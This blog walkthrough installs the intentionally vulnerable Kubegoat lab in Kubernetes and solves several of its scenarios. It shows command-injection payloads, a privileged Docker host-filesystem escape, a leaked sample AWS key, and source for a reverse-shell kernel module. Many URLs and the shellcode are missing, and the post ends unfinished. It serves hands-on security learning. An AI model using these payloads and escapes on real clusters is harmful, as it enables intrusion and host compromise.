Installing and Solving Kubegoat in Kubernetes cluster running on VMs.

5 min readSep 3, 2023

Welcome to this blog post on “Installing Kubegoat in a Kubernetes cluster running on VMs.” In this post, we will walk through the steps of installing Kubegoat, a tool designed to simulate real-world Kubernetes cluster misconfigurations and vulnerabilities, in a Kubernetes cluster running on virtual machines.

In addition to installing Kubegoat in a Kubernetes cluster running on VMs, we will also go through and solve each module of Kubegoat. This will provide a hands-on learning experience and help us understand how to identify and fix common misconfigurations and vulnerabilities in a Kubernetes cluster.

In a previous blog post(, we discussed how to deploy a Kubernetes cluster . If you haven’t already, I recommend reading that post first to get a better understanding of the basics of setting up a Kubernetes cluster. With that knowledge in hand, we can now move on to installing Kubegoat and exploring its capabilities.


Prerequisite: The Kubernetes cluster should be up and running.

  1. Cloning the kube-goat project.
git clone

2. Installing helm.

curl | bash

3. Setting up kubegoat.


4. Exposing kubegoat.


Scenario 1: Sensitive keys in codebases
dirsearch -u
./ test
git log -p
#First Flag

aws_access_key_id = AKIVSHD6243H22G1KIDC
aws_secret_access_key = cgGn4+gDgnriogn4g+34ig4bg34g44gg4Dox7c1M

Scenario 2: DIND(docker-in-docker)

a. Command injection

#command injection in ping functionality;id

b. Finding mounted docker socket:

;find / -name docker.sock

c. Installing static binary for docker cli:

curl -OL
;ls -al docker-24.0.5.tgz
;tar -xvf docker-24.0.5.tgz
#Extracting takes around 5 min, so be patient

d. Spinning up a new container with the mounted hosts file system and — privilege flag

; /docker/docker -H unix:///custom/docker/docker.sock pull ubuntu
; /docker/docker -H unix:///custom/docker/docker.sock run -it --privileged -v /:/host_fs/ ubuntu bash

Note: In this challenge host is also a docker container.

Scenario 3: SSRF in the Kubernetes (K8S) world

a. Finding and confirming SSRF using

b. TCP Port scanning via SSRF:

We found port 5000 is running a web server giving HTTP response saying refer to metadata.db end point.

c. We found a secret via this metadata.db end point.



Scenario 4: Container escape to the host system(CAP_SYS_MODULE- kernel module and CAP_SYS_CHROOT-chroot)

a. We start from a shell within a container.

b. Checking linux capabilities-

capsh --decode=`/bin/sh -c 'cat /proc/1/status' | grep -i 'CapEff' | awk '{print $2}'`

c. There are many capabilities which can be abused here. Let’s use CAP_SYS_MODULE to install our malicious kernel module.

d. Finding the IP address of container:

e. Kernel Module:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kmod.h>
#include <linux/init.h>

MODULE_DESCRIPTION("Shorter reverse shell LKM");

//msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=4443 -f c
static char shellcode[] =

typedef void (*sc)(void);

static int __init reverse_shell_init(void) {
sc code = (sc)shellcode;
return 0;

static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting");


f. Make file:

obj-m +=reverse-shell.o

make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

g. Compile and transfer kernel module to container:

cd /lib/modules && wget

h. We were unable to load this kernel module as insmod tool is not available. We tried installing that but failed.

insmod reverse-shell.ko

i. If we check root directory we find that host’s file system is mounted at /host-system and we have CAP_SYS_CHROOT capability in our container.


g. There is a simple container breakout abusing these. We just need to run the below command:

Note: Just for fact check we ran ip a command which is not available within container but available in host.

To be continued….

Thanks for reading!